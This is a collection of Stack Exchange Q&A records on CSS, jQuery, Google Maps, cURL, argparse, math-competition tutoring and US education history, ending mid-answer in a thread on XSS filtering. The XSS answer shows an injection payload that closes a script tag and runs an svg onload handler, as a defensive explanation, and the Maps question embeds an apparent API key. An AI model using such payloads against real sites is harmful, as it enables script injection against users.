http:\/\/jsfiddle.net\/dtavqsh6\/\nAnswer: As others have mentioned, this currently a bug in Chrome. The code below is the proper way to do what you're asking:\n<code>select option {text-transform:capitalize}\n<\/code>\nHere's a working fiddle to demonstrate (view in something other than Chrome)\nAdditional Information:\nI think you'll also find that the above method does not work in Safari as well. If you want a cross-browser solution, JavaScript will be your only option.\nIf you're open to it, here's a simple jQuery example:\n<code>$(\"option\").each(function() {\n var $this = $(this);\n $this.text($this.text().charAt(0).toUpperCase() + $this.text().slice(1));\n});\n<\/code>\nAnd a working fiddle.\n\n** UPDATE **\n\nThis question was originally answered in 2011. The above-referenced bug has since been squashed, and the CSS below is enough to capitalize each option in all browsers.\n<code>select, select option {text-transform:capitalize}\n<\/code>\nComment: Works if you style 'select' now in Chrome.\nComment: select option {text-transform:capitalize} not working for firefox\nComment: works best if you do on both actually: `select, select option {text-transform:capitalize}`\nComment: As of 2022 I'm not seeing this working in Chrome to style just the `option`. You can style the `select` but my form uses a font that looks on brand for the form elements to have caps, but the `select option` I want to be `capitalize`, yet it has no effect. Looking in the inspector shows the rule and it's not being overridden, just not supported, even with `!important`.\nComment: As of 2023, this does not appear to work in Firefox\nComment: @Scribblemacher I just tested in firefox and it works properly. Are you testing the JS from 2011 or the CSS?\nAnswer: This will work in all browsers:\n<code>select {text-transform:capitalize}\n<\/code>\nComment: When on iphone chrome), only the selected option seems to be capitalised, others in scrollable menu stille are lowercase.\nComment: This works for the displayed\/choosen value only, but when you click on the list , the other elements are not capitalized.\nComment: This one is better, simple and straight forward.\nComment: How could you just capitalize the first word crossbrowser if there are more than one in each option?\nComment: @Marcel I answered this on another thread look for my answer here: http:\/\/stackoverflow.com\/questions\/15242592\/angular-js-how-to-autocapitalize-an-input-field\/22561169#22561169\nAnswer: You could use a small jQuery script to get it working in Chrome too:\nhttp:\/\/jsfiddle.net\/p6wbf\/1\/\nComment: Works if you style 'select' now in Chrome.\nAnswer: select option {text-transform:capitalize} \nUse Above CSS make sure your option values are not in UPPERCASES. if they are, first lower them using strtolower() in PHP and the style will work for you perfectly.\n","meta":{"source":"stackoverflow","title":"Does text-transform: Capitalize work for elements, and if so in which browsers?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Which math subjects should I know well to tutor competitive mathematics?\n\nQuestion: I may one day be interested in teaching students who are preparing for, say, the IMO or other math competitions. However, I haven't found a particularly clear statement about exactly what material is on it. I know they contain algebra, geometry, combinatorics, and number theory, but is there any other well-defined subject that is tested in these competitions? \nI know there are a number of resources for preparing students and teachers for these competitions, but reading a document that is exclusively about the competition feels too narrow--I'd rather learn the subjects that are tested instead, and then apply that knowledge to teaching the competition material.\nAnswer: \nI know they contain algebra, geometry, combinatorics, and number theory, but is there any other well-defined subject that is tested in these competitions? \n\nConsulting Gelca and Andreescu's (2007) Putnam and Beyond, there are also:\n\nmethods of proof\nreal analysis\ntrigonometry\nprobability\n\nand, within each of these \"well-defined subjects,\" many sub-categories.\nAlthough non-exhaustive - and intended for a particular mathematics competition, i.e., the Putnam - I believe this provides a reasonable skeleton. Moreover, drawing again from this same reference, here are the chapter-by-chapter breakdowns of content.\n(Click the first image for a higher-resolution version.)\nComment: [One nice feature of this book, by the way, is that it contains *solutions* for all of its problems!]\nComment: @RoryDaulton I strongly disagree with your assessment of this as \"not on-point.\" The OP asks about topics to read into in preparation for \"the IMO or other math competitions.\" I might also note that some high school students *do* take the Putnam; not many, but nor are there many preparing for the IMO (and IMOers are very likely to take the Putnam, if not in high school then by their first year in college; to score well necessitates tremendous preparation beforehand). Still, a single post\/book necessarily excludes topics; if you are aware of other lists, then I hope you will post them, too!\nComment: The OP has the tag \"secondary education,\" so information about a college-level competition such as the Putnam is not on-point.\nComment: Solutions are for faint-hearted problem solvers. I want my math books to torture me :)\nComment: @NiloCK Tear 'em out! Easier to destroy than to create (plus, I happen to like the added challenge of finding alternative solutions: especially ones that [I think] are more \"elegant\" than the book's!).\nAnswer: First of all, it might be worth pointing out that algebra can be split in inequalities, polynomials and functional equations. Not all problems fall in one of these three categories, but I think that approximately four-fifths does. The others are mainly about sequences.\nSome introduction to graph theory (as a part of combinatorics) would also be nice. There aren't many problems about it, but you don't want to get an graph question on the IMO and barely knowing what a graph is. Those graph questions are usually not too hard if you have some experience with them. \nComment: @BenjaminDickman I know. However, your answer (or at least the book) is more focused on contests like Putnam. For example, I think it is a bad idea to cover functional equations with differential equations. They require really different techniques.\nComment: If you check my earlier answer, then you will see (by viewing the first image in its high-res version) that algebra is broken down into several parts (although functional equations are placed later on, in real analysis). Similarly, combinatorics contains sub-categories (e.g., Euler's Formula for planar graphs... though there could certainly be more about graph theory!).\nAnswer: Knowing your math subjects is one thing, but experience with creative problem solving itself is key.\nPolya's 'How to Solve It', while a bit dated in its language, is still a good reference for anyone interested in improving as a problem solver or helping others to improve. This book is light on example problems or mathematical work, but talks generally about the processes which serve us when confronted with difficult problems - reduction to smaller case, finding analogy with simpler problems which we're already able to solve, etc. I'd say that it's required reading in this area.\nIt's been a while since I read it, but I really enjoyed and benefitted from Paul Zeitz's 'Art and Craft of Problem Solving'. This book contains a fair number of problems which exemplify different specific strategies for solving problems - finding and exploiting a symmetry, induction, etc. This one would be useful for preparing lectures \/ lessons on specific mathematical topics and techniques.\nComment: (An irresistible side-note: One of my favorite problems is #3.4.31 in \"A&CoPS\" (2e, p. 107) by Paul Zeitz. Essentially, it says: There are 23 people with integral weight, such that whomever you remove, the remaining 22 can be partitioned into two groups of 11 - each with the same total weight. Prove that all 23 people must weigh the same amount. A few years ago I began to track down this problem's history, from the original formulation with integral weights through the abstraction to weights in $\\mathbb{C}$. I recorded my findings in [**MO105400**](http:\/\/mathoverflow.net\/q\/105400\/)...)\n","meta":{"source":"matheducators.stackexchange","title":"Which math subjects should I know well to tutor competitive mathematics?","dup_signals":{}},"subset":"stackexchange"} +{"text":"At what point did high school become a standard prerequisite for university students in the USA?\n\nQuestion: Earlier in US history, it was common for universities to admit students via entrance exam. A quote in this answer quoting Colonial Education explains \"The boys from upper class families were taught be private home tutors and then sent to college or university.\"\nNowadays, a high school diploma or an officially recognized equivalency (such as passing the GED exam) is generally recognized as the standard way to qualify to start studying at a US institution of higher education. Although such a credential is not strictly an absolute requirement even today, the idea of \"finish high school, go to college\" seems to have been standard in the USA at least as far back as the 1950's (with enrollment of \"non-completers\" or \"dropouts\" as the exception to the rule rather than standard practice), as my parents reported to me that essentially the same formal expectations existed then.\nAt what point did graduation from a \"High School\" or the achievement of an equivalency qualification specifically recognized as equivalent to high school become the standard way to get into a university, with other paths becoming the exception rather than the rule?\nYes, I know that it is still possible for someone to be homeschooled, pass the GED at age 18, and then go straightaway to college, but the GED is specifically recognized as high school equivalent, not a truly distinct academic pathway. I'm talking about a time period when there was no concept of a high school equivalency, or when the achievement of a high school qualification was truly an optional part of the process of qualifying for university. That is, an aspiring university student might have chosen to complete a high school qualification because their parents wanted them to, because they wanted the \"high school experience\", because they were being funded to attend, because it was easy for them, etc. but they could have reasonably and without too much head-turning short-circuited the process and\/or followed an older, still common alternative path to a university (e.g. private tutoring toward passing a direct entrance examination, getting sponsorship from a local politician, making a substantial bribe large grant offering, etc.) if they had wanted to.\nAlternately, when was the first time in US history where an incoming Freshman might hear something like, \"Wow, you did the thing where you study at home with private tutors and then get five alumni to endorse your academic abilities? What a weirdo! Nobody does that anymore! If you want to be in the \"cool\" crowd, it's all about getting your high school diploma! I wouldn't be surprised if the university abolishes all those non-high school paths next year.\"\nComment: Here's an essay with some very relevant info: https:\/\/commons.trincoll.edu\/edreform\/2014\/05\/accepted-the-evolution-of-college-admission-requirements\/\nAnswer: \nQuestion:\n At what point did high school become a standard prerequisite for university students in the USA?\n\nThe United States educational system unlike those in Europe is not centralized and thus the above question varies by state and sometimes varies by county. So while Massachusetts converted the private high school Boston Latin to become the first public High school in 1820, and 7 years later offered free education to children of all ages including free High school as early as 1827; most of the rest of the United States didn't follow suit for 100 years. \nSecondly the United States secondary school system was a terminal degree. It was not meant to be a preparatory program for higher Education. So while the United States experienced a High School movement from 1910 to 1940. When communities prioritized High school programs as a way to attract people and businesses; leading to mass opening of high schools. \"In 1910 18% of 15- to 18-year-olds were enrolled in a high school; barely 9% of all American 18-year-olds graduated. By 1940, 73% of American youths were enrolled in high school and the median American youth had a high school diploma.\"\nBut that doesn't entirely answer your question because most University students did not matriculate from this public high school system, but from private schools. University degrees remained primarily pursuits for the wealthy and public high school programs remained a terminal free degree for everybody else.\nWhat switched everything up was the \"The Servicemen's Readjustment Act of 1944\" or the GI Bill. This opened the doors of higher education to most of the country. 7.7 million former soldiers took advantage of the GI bill's higher education benefits and 2.2 million of these used their benefits for college. In 1947 Life magazine published a cover story in which they recognized how more than half of all university students were there due to the GI Bill.\n\nThis is when public school graduates first outnumbered private education graduates. This is also when Universities adopted standardized pre-requisites to meet and new demand for their services.\nSo in conclusion, no standardization in US secondary school programs, so the question demands we consider trends. High School Diploma's could not have become standard for College Admission in the United States prior to the High School movement where High Schools graduates became the majority of the population or roughly 1940.. Nor could they become standard for University Admission prior to public High school students being able to afford and becoming the majority in those Universities; and that occurred in 1947.\nSources: \n\nHigh school (North America)\nHow the G.I. Bill Changed the Face of Higher Education in America\nThe High school Movement\nThe GI Bill\nHigher Education in the United States\n","meta":{"source":"history.stackexchange","title":"At what point did high school become a standard prerequisite for university students in the USA?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using jQuery's Sizzle Engine to find a class (advanced)\n\nQuestion: What I am attempting to do is see if a jQuery object (or even DOM element for that matter) contains a particular class using the same selectors as the Sizzle engine.\njQuery publicly exposes Sizzle with the following:\n<code>jQuery.find = Sizzle;\njQuery.expr = Sizzle.selectors;\njQuery.expr[\":\"] = jQuery.expr.filters;\njQuery.unique = Sizzle.uniqueSort;\n<\/code>\nI can successfully use the find method to determine that a particular DOM element has a class matching my selector but I cannot seem to find a way to get access to the name of the selector that matched. \nEXAMPLE (NOT WORKING AS INTENDED)\n<code>$.fn.extend({\n getMatchingClass: function(selector) {\n return this.each(function() {\n var match = jQuery.find.matches('*[class'+selector+']', [this]);\n \/\/ I would like to return the matching class's FULL NAME,\n \/\/ i.e. lightbox_RESTOFCLASS\n alert(match[0]);\n });\n }\n});\n\nvar class = $('#lightbox').getMatchingClass('^=\"lightbox_\"');\n<\/code>\nIs it possible to use Sizzle to return the class name which matched my selector?\nComment: it could match multiple and different classes..\nAnswer: You could use the <code>attr( name )<\/code> function of the jQuery library ..\nYou could modify your original function to take as parameters both the selector and the attribute to apply it to .. this way you can query the results for the specified attribute value.\n<code>$.fn.extend({\n getMatchingClass: function(attribute, selector) {\n return this.each(function() {\n var match = jQuery.find.matches('*['+attribute+selector+']', [this]);\n \/\/ I would like to return the matching class's FULL NAME,\n \/\/ i.e. lightbox_RESTOFCLASS\n alert( $(match[0]).attr(attribute) );\n });\n }\n});\n<\/code>\nKeep in mind that the selector might match more than one classes. Which result would you want then? a list of all matches ? or just the first (as the alerted value in the example)\n[edit] this does not take into account though the case where you have more than one class on an item ..\nAnswer: Now that I better understand your question, have you tried using native Sizzle selectors to do what you're trying to do? \nThe contains word selector should do what you're looking for:\n<code>$('#lightbox').find(\"[class~='lightbox']\");\n<\/code>\nOnce you have the element, you can then easily get the class name by calling <code>attr(...)<\/code>:\n<code>var className = $('#lightbox').find(\"[class~='lightbox_']\").attr('class');\n<\/code>\nThis will only give you the entire class attribute, not the individual classes for the element. You'd have to <code>split(' ')<\/code> the className to get the individual classes and find a matching class. \n<code>function getSimilarClass(className, searchString) {\n var classes = className.split(' ');\n for(var i = 0; i < classes.length; i++) {\n if (classes[i].indexOf(searchString) != -1) {\n return classes[i];\n }\n }\n return null;\n}\nvar className = $('#lightbox').find(\"[class~='lightbox_']\").attr('class');\nvar match = getSimilarClass(className, \"lightbox_\");\n<\/code>\nThis process has flaws however, since there could be multiple tags with similar classes, which this won't account for, and individual tags could potentially have several classes with similar names.\nComment: @Dan - I would like to find the particular classes *full name* matching a Sizzle selector. For example: If you only know the beginning part of the class name and you would like to find the full name of that class.\nAnswer: of course your selector doesnt have to be \"li\" it can be whatever criteria you do know about the items you want to select. but to get the entire class attribute, just use the .attr(\"class\") selector. like this\n<code>$(document).ready(function(){\n $(\"li\").each(function (i) {\n var class = $(this).attr(\"class\");\n alert(class);\n });\n});\n<\/code>\nComment: @Jon - I'm only looking for a particular class match, not the entirety of the class attribute.\nAnswer: I've come up with a non-sizzle solution using a subset of selectors (<code>^=<\/code>, <code>$=<\/code>, <code>*=<\/code>, and <code>=<\/code>) which is fully working. A Sizzle solution would have been nice, however. This should at least demonstrate what the intended functionality of the plugin should do.\n<code>$.fn.getMatchingClass = function(selector) {\n var regex, class, tmp, $this;\n tmp = $(this)[0].className;\n class = selector;\n class = class.replace(\/(\\^|\\*|\\$)?=\/i, '');\n class = class.replace(\/\\\"\/g, '');\n if (selector.indexOf('$=') != -1) {\n regex = new RegExp('[\\\\s]+' + class + '$', 'i');\n } else if (selector.indexOf('^=') != -1) {\n regex = new RegExp('^' + class + '[\\\\s]+', 'i');\n } else if (selector.indexOf('*=') != -1) {\n regex = new RegExp('[a-zA-z0-9_\\\\-]*' + class + '[a-zA-z0-9_\\\\-]*', 'gi');\n } else if (selector.indexOf('=') != -1) {\n regex = new RegExp('^' + class + '$', 'i');\n } else return false;\n return tmp.match(regex);\n}\n\nvar class = $('#myID').getMatchingClass('*=\"lightbox\"');\nvar class2 = $('#myID').getMatchingClass('^=lightbox');\nvar class3 = $('#myID').getMatchingClass('=\"lightbox\"');\nvar class4 = $('#myID').getMatchingClass('$=lightbox');\nalert(class);\nalert(class2);\nalert(class3);\nalert(class4);\n<\/code>\n","meta":{"source":"stackoverflow","title":"Using jQuery's Sizzle Engine to find a class (advanced)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google Maps API GeoLocation not working for mobile\n\nQuestion: I'm not really sure why the GeoLocation works on my PC, but not my iPhone ... I've got <code>sensor=true<\/code> within the script call to the API, but apart from that, I'm at a loss. Here's the entire script:\n<code> <div id=\"info\"><\/div>\n <div id=\"map_canvas\" style=\"width:908px; height:420px\"><\/div>\n <input type=\"text\" id=\"addressInput\" size=\"10\"\/>\n <select id=\"radiusSelect\">\n <option value=\"5\" selected>5mi<\/option>\n <option value=\"15\" selected>15mi<\/option>\n <option value=\"25\" selected>25mi<\/option>\n <option value=\"100\">100mi<\/option>\n <option value=\"200\">200mi<\/option>\n <option value=\"4000\">4000mi<\/option>\n <\/select>\n <input type=\"button\" value=\"Search\" onclick=\"searchLocations();\">\n <div><select id=\"locationSelect\" style=\"width:100%;visibility:hidden\"><\/select><\/div> \n\n <script type=\"text\/javascript\" src=\"http:\/\/maps.googleapis.com\/maps\/api\/js?key=AIzaSyCe49sI29q0AVNo9iVvQ-lDlDwZpFZuA4o&sensor=true\"><\/script>\n <script type=\"text\/javascript\" src=\"http:\/\/gmaps-samples-v3.googlecode.com\/svn\/trunk\/geolocate\/geometa.js\"><\/script>\n <script type=\"text\/javascript\">\n\n var map;\n var markers = [];\n var infoWindow;\n var locationSelect;\n\n function load() {\n map = new google.maps.Map(document.getElementById(\"map_canvas\"), {\n center: new google.maps.LatLng(40, -100),\n zoom: 4,\n mapTypeId: 'roadmap',\n mapTypeControlOptions: {style: google.maps.MapTypeControlStyle.DROPDOWN_MENU}\n });\n infoWindow = new google.maps.InfoWindow();\n\n locationSelect = document.getElementById(\"locationSelect\");\n locationSelect.onchange = function() {\n var markerNum = locationSelect.options[locationSelect.selectedIndex].value;\n if (markerNum != \"none\") {\n google.maps.event.trigger(markers[markerNum], 'click');\n }\n };\n\n \/\/ geolocation\n prepareGeolocation();\n doGeolocation();\n }\n\n function doGeolocation() {\n if (navigator.geolocation) {\n navigator.geolocation.getCurrentPosition(positionSuccess, positionError);\n } else {\n positionError(-1);\n }\n }\n\n function positionError(err) {\n var msg;\n switch(err.code) {\n case err.UNKNOWN_ERROR:\n msg = \"Unable to find your location\";\n break;\n case err.PERMISSION_DENINED:\n msg = \"Permission denied in finding your location\";\n break;\n case err.POSITION_UNAVAILABLE:\n msg = \"Your location is currently unknown\";\n break;\n case err.BREAK:\n msg = \"Attempt to find location took too long\";\n break;\n default:\n msg = \"Location detection not supported in browser\";\n }\n document.getElementById('info').innerHTML = msg;\n }\n\n function positionSuccess(position) {\n \/\/ Centre the map on the new location\n var coords = position.coords || position.coordinate || position;\n var latLng = new google.maps.LatLng(coords.latitude, coords.longitude);\n map.setCenter(latLng);\n map.setZoom(15);\n var marker = new google.maps.Marker({\n map: map,\n position: latLng,\n title: 'Why, there you are!'\n });\n document.getElementById('info').innerHTML = 'Looking for <b>' +\n coords.latitude + ', ' + coords.longitude + '<\/b>...';\n\n \/\/ And reverse geocode.\n (new google.maps.Geocoder()).geocode({latLng: latLng}, function(resp) {\n var place = \"You're around here somewhere!\";\n if (resp[0]) {\n var bits = [];\n for (var i = 0, I = resp[0].address_components.length; i < I; ++i) {\n var component = resp[0].address_components[i];\n if (contains(component.types, 'political')) {\n bits.push('<b>' + component.long_name + '<\/b>');\n }\n }\n if (bits.length) {\n place = bits.join(' > ');\n }\n marker.setTitle(resp[0].formatted_address);\n }\n document.getElementById('info').innerHTML = place;\n });\n }\n\n function contains(array, item) {\n for (var i = 0, I = array.length; i < I; ++i) {\n if (array[i] == item) return true;\n }\n return false;\n }\n\n function searchLocations() {\n console.log(\"searching locations...\");\n var address = document.getElementById(\"addressInput\").value;\n var geocoder = new google.maps.Geocoder();\n geocoder.geocode({address: address}, function(results, status) {\n if (status == google.maps.GeocoderStatus.OK) {\n searchLocationsNear(results[0].geometry.location);\n } else {\n alert(address + ' not found');\n }\n });\n }\n\n function clearLocations() {\n \/\/infoWindow.close();\n for (var i = 0; i < markers.length; i++) {\n markers[i].setMap(null);\n }\n markers.length = 0;\n\n locationSelect.innerHTML = \"\";\n var option = document.createElement(\"option\");\n option.value = \"none\";\n option.innerHTML = \"See all results:\";\n locationSelect.appendChild(option);\n locationSelect.style.visibility = \"visible\";\n }\n\n function searchLocationsNear(center) {\n clearLocations();\n\n var radius = document.getElementById('radiusSelect').value;\n \/* var searchUrl = 'phpsqlajax_search.php?lat=' + center.lat() + '&lng=' + center.lng() + '&radius=' + radius; *\/\n var searchUrl = 'http:\/\/dev-imac.local\/phpsqlajax_search.php?lat=' + center.lat() + '&lng=' + center.lng() + '&radius=' + radius;\n console.log(searchUrl);\n downloadUrl(searchUrl, function(data) {\n var xml = parseXml(data);\n var markerNodes = xml.documentElement.getElementsByTagName(\"marker\");\n var bounds = new google.maps.LatLngBounds();\n for (var i = 0; i < markerNodes.length; i++) {\n var name = markerNodes[i].getAttribute(\"name\");\n var address = markerNodes[i].getAttribute(\"address\");\n var distance = parseFloat(markerNodes[i].getAttribute(\"distance\"));\n var latlng = new google.maps.LatLng(\n parseFloat(markerNodes[i].getAttribute(\"lat\")),\n parseFloat(markerNodes[i].getAttribute(\"lng\")));\n\n createOption(name, distance, i);\n createMarker(latlng, name, address);\n bounds.extend(latlng);\n }\n map.fitBounds(bounds);\n });\n }\n\n function createMarker(latlng, name, address) {\n var html = \"<b>\" + name + \"<\/b> <br\/>\" + address;\n var marker = new google.maps.Marker({\n map: map,\n position: latlng\n });\n google.maps.event.addListener(marker, 'click', function() {\n infoWindow.setContent(html);\n infoWindow.open(map, marker);\n });\n markers.push(marker);\n }\n\n function createOption(name, distance, num) {\n var option = document.createElement(\"option\");\n option.value = num;\n option.innerHTML = name + \"(\" + distance.toFixed(1) + \")\";\n locationSelect.appendChild(option);\n }\n\n function downloadUrl(url, callback) {\n var request = window.ActiveXObject ?\n new ActiveXObject('Microsoft.XMLHTTP') :\n new XMLHttpRequest;\n\n request.onreadystatechange = function() {\n if (request.readyState == 4) {\n request.onreadystatechange = doNothing;\n callback(request.responseText, request.status);\n }\n };\n\n request.open('GET', url, true);\n request.send(null);\n }\n\n function parseXml(str) {\n if (window.ActiveXObject) {\n var doc = new ActiveXObject('Microsoft.XMLDOM');\n doc.loadXML(str);\n return doc;\n } else if (window.DOMParser) {\n return (new DOMParser).parseFromString(str, 'text\/xml');\n }\n }\n\n function doNothing() {}\n\n window.onload = load();\n\n <\/script>\n<\/code>\nAnswer: First of all, \n<code>mapTypeId: 'roadmap',\n<\/code>\nshould be:\n<code>mapTypeId: google.maps.MapTypeId.ROADMAP,\n<\/code>\nbut that should cause it to fail in your PC as well.\nOther than that, your <code><script><\/code> section should be in the <code><head><\/code> section of the document and not in the <code><body><\/code>. Maybe the iPhone browser is more strict about this than the browser on your PC. What browser(s) are you using in each system? (I'm guessing you're using IE on the PC. Have you tried other browsers?)\nComment: Safari. And the PC or Mac is not an issue at all... it's just my iPhone.\nComment: I am not familiar with the iPhone browser, but in the case of Android the browsers are very \"minified\", (light weight for mobile), which means they are less tolerant of minor errors and your code needs to be more standard compliant.\nComment: Well, this code is literally all from Google ... no customizations. So I'm not understanding what the issues are.\nComment: I doubt it is written by Google because it has the problems I pointed out in my answer. Does the iPhone browser have an error log?\nComment: https:\/\/developers.google.com\/maps\/articles\/phpsqlsearch_v3 ... https:\/\/developers.google.com\/maps\/articles\/geolocation ... literally written by Google. And even with Safari's Debug console on, there's no error.\nComment: And even when you go to: https:\/\/google-developers.appspot.com\/maps\/documentation\/javascript\/examples\/map-geolocation on your mobile device, it doesn't work. Not making much sense to me...\nComment: The code in the link you posted uses mapTypeId: google.maps.MapTypeId.ROADMAP, as I pointed out in my answer, so your code is **not** original from Google.\nComment: It is in the first link I sent. This is not really something that I want to argue about. Thanks for trying to help.\n","meta":{"source":"stackoverflow","title":"Google Maps API GeoLocation not working for mobile","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to force cURL to send a complete URL as request target?\n\nQuestion: How does I force curl to include the complete URL in the HTTP GET request?\nCurl sends (not working):\n<code>GET \/some\/path HTTP\/1.1\nHost: my-domain-here.com\n...\n<\/code>\nI want it to be (working):\n<code>GET http:\/\/my-domain-here.com\/some\/path HTTP\/1.1\nHost: i2.wp.com\n<\/code>\nSo I want the host to be always included in the GET line. How can I do this using CURL\/PHP?\nThe server can only handle absolute URLs.\nAnswer: The PHP cURL wrapper does not expose a way of doing this as far as I know.\nAlso, cURL will automatically change the <code>Host<\/code> header even if you specify a different one.\nFor example:\n<code>curl -v --dump-header - -0 -H 'Host: my-domain.com' http:\/\/subdomain.my-domain.com\/something.html\n<\/code>\nwill ignore the custom header and send this:\n<code>GET \/something.html HTTP\/1.0\nUser-Agent: curl\/7.35.0\nHost: subdomain.my-domain.com\nAccept: *\/*\n<\/code>\nWhat you can do is build the request manually:\n<code>$host = 'my-domain.com';\n$path = 'http:\/\/subdomain.my-domain.com\/something.html';\n\n$fp = fsockopen($host, 80);\n\nfputs($fp, \"GET $path HTTP\/1.1\\r\\n\");\nfputs($fp, \"Host: $host\\r\\n\");\nfputs($fp, \"Content-type: application\/x-www-form-urlencoded\\r\\n\");\nfputs($fp, \"Content-length: 0\\r\\n\");\nfputs($fp, \"Connection: close\\r\\n\\r\\n\");\n\n$result = ''; \nwhile(!feof($fp)) {\n $result .= fgets($fp, 128);\n}\n\nfclose($fp);\n\necho $result;\n<\/code>\nComment: curl\/7.29.0 does allow to override the Host header.\nAnswer: At least from the command line, curl does send absolute URIs if you configure it to use a HTTP proxy for the request. Even if you're not using a proxy, you can specify that that it use the actual server as the proxy server, and your server will then receive the absolute URI in the request.\nComment: cURL using PHP also does this, I'm looking for a way to prevent it and froce cURL to send the relative URL.\nComment: Do you mean like using the flag: `--proxy1.0 example.com:80`?\nAnswer: <code>curl<\/code> has <code>--request-target<\/code> option\nThe following command will\n\nConnect to <code>127.0.0.1<\/code>\nSend request path as <code>GET http:\/\/request.host.name\/path\/ HTTP\/1.1<\/code>\nSet <code>Host<\/code> header to <code>Host: host.header<\/code>\n\n<code>curl http:\/\/127.0.0.1 -v \\\n --request-target http:\/\/request.host.name\/path\/ \\\n --path-as-is \\\n -H \"Host: host.header\"\n<\/code>\n<code>* Trying 127.0.0.1:80...\n* TCP_NODELAY set\n* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)\n> GET http:\/\/request.host.name\/path\/ HTTP\/1.1\n> Host: host.header\n> User-Agent: curl\/7.68.0\n> Accept: *\/*\n>\n* Mark bundle as not supporting multiuse\n< HTTP\/1.1 404 Not Found\n< Server: nginx\/1.14.0\n< Date: Fri, 19 Aug 2022 10:14:14 GMT\n< Content-Type: text\/html\n< Content-Length: 169\n< Connection: keep-alive\n<\n<html>\n<head><title>404 Not Found<\/title><\/head>\n<body bgcolor=\"white\">\n<center><h1>404 Not Found<\/h1><\/center>\n<hr><center>nginx\/1.14.0<\/center>\n<\/body>\n<\/html>\n* Connection #0 to host 127.0.0.1 left intact\n<\/code>\nAnswer: <code>curl<\/code> always acts as a correct HTTP client. The standard requires that the request target (i.e. what follows the GET) only consists of an absolute path and optionally a query.\nSo it is not possible to make <code>curl<\/code> send an absolute URL as request target to an origin server.\n","meta":{"source":"stackoverflow","title":"How to force cURL to send a complete URL as request target?","dup_signals":{}},"subset":"stackexchange"} +{"text":"__init__() got an unexpected keyword argument 'required' using argparse in Python 2\n\nQuestion: I have below python script which if I run with <code>Python 2.7.16<\/code> version then I get an error but if I run with <code>Python 3<\/code> version then it works fine.\nBelow is my code:\n<code>from argparse import ArgumentParser\n\ndef parse_cli_arguments():\n parser = ArgumentParser(\n description='some stuff'\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"verbose output\",\n action=\"store_true\"\n )\n subparser = parser.add_subparsers(\n title=\"action\",\n dest='action',\n required=True,\n help='action sub-command help'\n )\n\n # create the subparser for the \"push\" command\n parser_push = subparser.add_parser(\n 'push',\n help='push help'\n )\n parser_push.add_argument(\n 'environment',\n type=str,\n help='push environment help'\n )\n parser_push.add_argument(\n 'instance',\n type=str,\n help='push instance help'\n )\n parser_push.add_argument(\n 'config',\n type=str,\n help='push config help'\n )\n\n # create the subparser for the \"status\" command\n parser_status = subparser.add_parser(\n 'status',\n help='status help'\n )\n parser_status.add_argument(\n 'environment',\n type=str,\n help='status environment help'\n )\n parser_status.add_argument(\n 'instance',\n type=str,\n help='status instance help'\n )\n return parser\n\ndef main():\n parser = parse_cli_arguments()\n args = parser.parse_args()\n if args.action == 'push':\n print('You chose push:', args.environment, args.instance, args.config)\n elif args.action == 'status':\n print('You chose status:', args.environment, args.instance)\n else:\n print('Something unexpected happened')\n\nif __name__ == '__main__':\n main()\n<\/code>\nProblem Statement\nBelow is the error I am getting with Python 2.7.16 version. Any thoughts what wrong am I doing here?\nI need to run my above code on Python 2.7.16 version.\n<code>\u276f python test.py\nTraceback (most recent call last):\n File \"test.py\", line 70, in <module>\n main()\n File \"test.py\", line 59, in main\n parser = parse_cli_arguments()\n File \"test.py\", line 17, in parse_cli_arguments\n help='action sub-command help'\n File \"\/Users\/andy\/.pyenv\/versions\/2.7.16\/lib\/python2.7\/argparse.py\", line 1678, in add_subparsers\n action = parsers_class(option_strings=[], **kwargs)\nTypeError: __init__() got an unexpected keyword argument 'required'\n<\/code>\nDo I need to change some syntax here to make it work with Python2?\nComment: `subparsers` used to be `required` by default, like a regular `positional`. The `required` option in Py3 has a long history. https:\/\/stackoverflow.com\/questions\/22990977\/why-does-this-argparse-code-behave-differently-between-python-2-and-3; https:\/\/stackoverflow.com\/questions\/23349349\/argparse-with-required-subparser\nAnswer: The api between 2.7 and 3 has changed. <code>sub_parsers<\/code> did not previously have the <code>required<\/code> keyword arg.\nHeres the function signature in the 2.7. docs\n<code>ArgumentParser.add_subparsers([title][, description][, prog][, parser_class][, action][, option_string][, dest][, help][, metavar])\n<\/code>\nand here it is in the 3.9 docs\n<code>ArgumentParser.add_subparsers([title][, description][, prog][, parser_class][, action][, option_string][, dest][, required][, help][, metavar])\n<\/code>\nA workaround is suggested by @hpaulj which involves setting the required attribute after the <code>add_subparsers<\/code> call. You can find the answer (and leave any upvotes) here and here.\n","meta":{"source":"stackoverflow","title":"__init__() got an unexpected keyword argument 'required' using argparse in Python 2","dup_signals":{}},"subset":"stackexchange"} +{"text":"XSS - double quote and backslash escaping\n\nQuestion: I'm currently testing my own XSS filter and don't know if I thought everything through, so I need some advice.\nLet's say my code looks like this:\n<code><script>\nvar test = {src: \"test\", layer: {\"input\": \"USER INPUT\", \"event\": \"ready\"}};\n<\/script>\n<\/code>\nIn this specific case, if I replace <code>\\<\/code> with <code>\\\\<\/code> and <code>\"<\/code> with <code>\\\"<\/code> is it possible to trick my filter? Of course the user input would be where USER INPUT is in my code.\nComment: Why don't you use an existing XSS filter?\nAnswer: \nIn this specific case, if I replace <code>\\<\/code> with <code>\\\\<\/code> and <code>\"<\/code> with <code>\\\"<\/code> is it possible to trick my filter?\n\nThat's not sufficient, your filter is insecure.\nE.g., one valid XSS attack vector would be <code><\/script><svg onload=alert(1)><\/code>, ending up with:\n<code><script>\nvar test = {src: \"test\", layer: {\"input\": \"<\/script><svg onload=alert(1)>\", \"event\": \"ready\"}};\n<\/script>\n<\/code>\nSince the XML (HTML) tree is parsed before any JS is evaluated, the closing script tag (<code><\/script><\/code>) will terminate the script despite being placed within a JS string.\nAnother problem with your filter are line breaks. If an attacker can insert a <code>0x0a<\/code> byte, they can break your script by causing a syntax error (since a double quoted string can't span multiple lines):\n<code><script>\nvar test = {src: \"test\", layer: {\"input\": \"\n\", \"event\": \"ready\"}};\n<\/script>\n<\/code>\nIf you're using PHP, a convenient filter function to work safely with user input inside JS is <code>json_encode()<\/code>. From this answer:\n\nWith plain PHP a common and safe approach is to use\n <code>json_encode()<\/code> as explained here. E.g.:\n<code>var foo = <?php echo json_encode($foo, 